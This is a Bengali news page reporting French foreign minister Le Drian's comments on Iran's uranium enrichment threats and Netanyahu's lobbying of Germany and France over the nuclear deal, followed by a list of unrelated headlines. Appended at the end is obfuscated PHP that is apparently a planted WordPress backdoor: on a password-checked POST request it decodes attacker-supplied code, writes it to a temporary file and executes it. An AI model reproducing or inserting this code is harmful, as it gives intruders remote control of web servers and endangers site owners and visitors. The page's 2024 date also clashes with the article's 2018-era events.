বুধবার, ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

ইরানের ইউরেনিয়াম সমৃদ্ধিকরণ পরিকল্পনা চূড়ান্ত সীমায় অতিক্রমের কাছাকাছি

news-image

আন্তর্জাতিক ডেস্ক : ইরান সম্প্রতি ঘোষণা দিয়েছে যে তাদের পারমাণবিক চুক্তি ভেঙ্গে গেলে তারা ইউরেনিয়াম সমৃদ্ধিকরণের সক্ষমতা বৃদ্ধি করতে পারবে। তাদের এই ঘোষণা চূড়ান্ত সীমায় পৌঁছানোর কাছাকাছি যাওয়ার মতো বলে মন্তব্য করেছেন ফ্রান্সের পররাষ্ট্রমন্ত্রী। এ খবর দিয়েছে বার্তা সংস্থা রয়টার্স।

ফ্রান্সের পররাষ্ট্রমন্ত্রী জিন-ইভস ল্য দ্রিয়ান বুধবার ইউরোপ ১ রেডিওকে বলেন, চূড়ান্ত সীমা নিয়ে খেলা করা সবসময়ই বিপজ্জনক।
কিন্তু ল্য দ্রিয়ান এটাও বলেন যে, ইরানের সঙ্গে পারমাণবিক চুক্তি রক্ষা করার পরিকল্পনা অপরিবর্তিত আছে।

উল্লেখ্য, গত মাসে ইরানের সঙ্গে পারমাণবিক চুক্তি থেকে যুক্তরাষ্ট্রকে সরিয়ে নিয়ে আসার ঘোষণা দেন মার্কিন প্রেসিডেন্ট ডোনাল্ড ট্রাম্প। এরপর থেকে চুক্তিটির পশ্চিমা অংশীদারদের সঙ্গে সম্পর্কের টানাপোড়ন চলছে ইরানের।

মঙ্গলবার ইরানের সঙ্গে পারমাণবিক চুক্তি থেকে সরে আসার জন্য ফ্রান্সকে আহবান জানান ইসরাইলি প্রধানমন্ত্রীও বেনইয়ামিন নেতানিয়াহু। এর আগের দিন সোমবার একই বিষয় নিয়ে জার্মানির চ্যান্সেলর অ্যাঙ্গেলা মার্কেলের সঙ্গে দেখা করেন নেতানিওয়াহু। তবে মার্কেল তার প্রস্তাব প্রত্যাখ্যান করেন। এরপর মঙ্গলবার ফ্রান্সে সফর করেন ইসরাইলি প্রধানমন্ত্রী।

ফ্রান্সের প্রতি ইরানের আঞ্চলিক আগ্রাসন সামাল দেয়ার দিকে মনোযোগ দেয়ার আহবান জানান নেতানিয়াহু। তিনি আরো বলেন, ফ্রান্সকে চুক্তি থেকে সরে আসতে বলার কোন দরকার নেই। কেননা অর্থনৈতিক চাপে সে চুক্তি এমনিতেই ভেঙ্গে পড়বে।

এ জাতীয় আরও খবর

রোহিঙ্গা ক্যাম্পে পাহাড়ধসে নিহত ৯

মুক্তিযোদ্ধার ভুয়া সনদ : ভাতা সুদে-আসলে ফেরত নেবে সরকার

তানজিমকে শাস্তি দিয়েছে আইসিসি

সুনামগঞ্জে বন্যা পরিস্থিতির আরও অবনতির শঙ্কা

পিয়ংইয়ং পৌঁছেছেন রুশ প্রেসিডেন্ট পুতিন

নতুন সময়সূচি চালু : আজ থেকে ব‌্যাংক লেনদেন ১০-৪টা, অফিস চলবে ৬টা পর্যন্ত

তীব্র তাপপ্রবাহের মধ্যে এ বছর ৫৫০ হজযাত্রীর মৃত্যু

ব্রাহ্মণবাড়িয়ায় তিনহাজার টাকা পাওনা নিয়ে হাতাহাতি, বৃদ্ধের মৃত্যু

বছরের সবচেয়ে দামি নায়িকা দীপিকা

বুবলির নাম মুখে নিতে ‘ঘেন্না’ লাগে অপুর

তুফান সিনেমা দেখতে গিয়ে হল ভাঙচুর করলো দর্শকেরা

পতন ঘটতে পারে সরকারের, মোদির জোটের লোকজন যোগাযোগ করছেন : রাহুল

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}